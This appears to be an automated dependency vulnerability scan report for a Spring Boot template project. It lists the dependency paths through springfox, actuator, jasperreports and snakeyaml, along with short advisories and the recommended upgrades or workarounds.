  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22

Overview

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling. Note: An application is vulnerable when the following is true:

The application evaluates user-supplied SpEL expressions.

Workaround

Evaluation of user-supplied SpEL expressions should be avoided when possible; otherwise, user-supplied SpEL expressions should be evaluated with a SimpleEvaluationContext in read-only mode. No other steps are necessary.

Remediation

Upgrade org.springframework:spring-expression to version 5.3.39 or higher.

References

medium severity

Denial of Service (DoS)

  • Vulnerable module: org.springframework.boot:spring-boot-actuator
  • Introduced through: org.springframework.boot:spring-boot-starter-actuator@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-actuator@2.7.3
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@2.7.18.

Overview

Affected versions of this package are vulnerable to Denial of Service (DoS) via HTTP requests, when both of these conditions are true:

  • Spring MVC or Spring WebFlux is in use.

  • org.springframework.boot:spring-boot-actuator is on the classpath.

Workaround

This vulnerability can be avoided by disabling web metrics: management.metrics.enable.http.server.requests=false

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade org.springframework.boot:spring-boot-actuator to version 2.7.18, 3.0.13, 3.1.6 or higher.

References

medium severity

Cryptographic Issues

  • Vulnerable module: org.bouncycastle:bcprov-jdk15on
  • Introduced through: net.sf.jasperreports:jasperreports@6.19.1

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b net.sf.jasperreports:jasperreports@6.19.1 com.lowagie:itext@2.1.7.js9 org.bouncycastle:bcprov-jdk15on@1.68
    Remediation: Upgrade to net.sf.jasperreports:jasperreports@6.20.1.

Overview

org.bouncycastle:bcprov-jdk15on is a Java implementation of cryptographic algorithms.

Affected versions of this package are vulnerable to Cryptographic Issues via weak key-hash message authentication code (HMAC) that is only 16 bits long which can result in hash collisions, as a result of an error within the BKS version 1 keystore (BKS-V1) files and could lead to an attacker being able to affect the integrity of these files. This vulnerability was introduced following an incomplete fix for CVE-2018-5382.

Remediation

Upgrade org.bouncycastle:bcprov-jdk15on to version 1.69 or higher.

References

medium severity

Information Exposure

  • Vulnerable module: org.bouncycastle:bcprov-jdk15on
  • Introduced through: net.sf.jasperreports:jasperreports@6.19.1

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b net.sf.jasperreports:jasperreports@6.19.1 com.lowagie:itext@2.1.7.js9 org.bouncycastle:bcprov-jdk15on@1.68

Overview

org.bouncycastle:bcprov-jdk15on is a Java implementation of cryptographic algorithms.

Affected versions of this package are vulnerable to Information Exposure due to missing validation for the X.500 name of any certificate, subject, or issuer. The presence of a wild card may lead to information disclosure. This could allow a malicious user to obtain unauthorized information via blind LDAP Injection, exploring the environment and enumerating data.

Note:

The exploit depends on the structure of the target LDAP directory as well as what kind of errors are exposed to the user.

Remediation

A fix was pushed into the master branch but not yet published.

References

medium severity

Improper Input Validation

  • Vulnerable module: io.springfox:springfox-swagger2
  • Introduced through: io.springfox:springfox-swagger2@3.0.0

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0

Overview

Affected versions of this package are vulnerable to Improper Input Validation. The input to the /api-docs?group= URL query parameter is untrusted input and is not encoded before being written to the log.

Remediation

There is no fixed version for io.springfox:springfox-swagger2.

References

medium severity

Stack-based Buffer Overflow

  • Vulnerable module: org.yaml:snakeyaml
  • Introduced through: org.springframework.boot:spring-boot-starter-actuator@2.7.3, org.springframework.boot:spring-boot-starter-cache@2.7.3 and others

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.0.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.0.0.
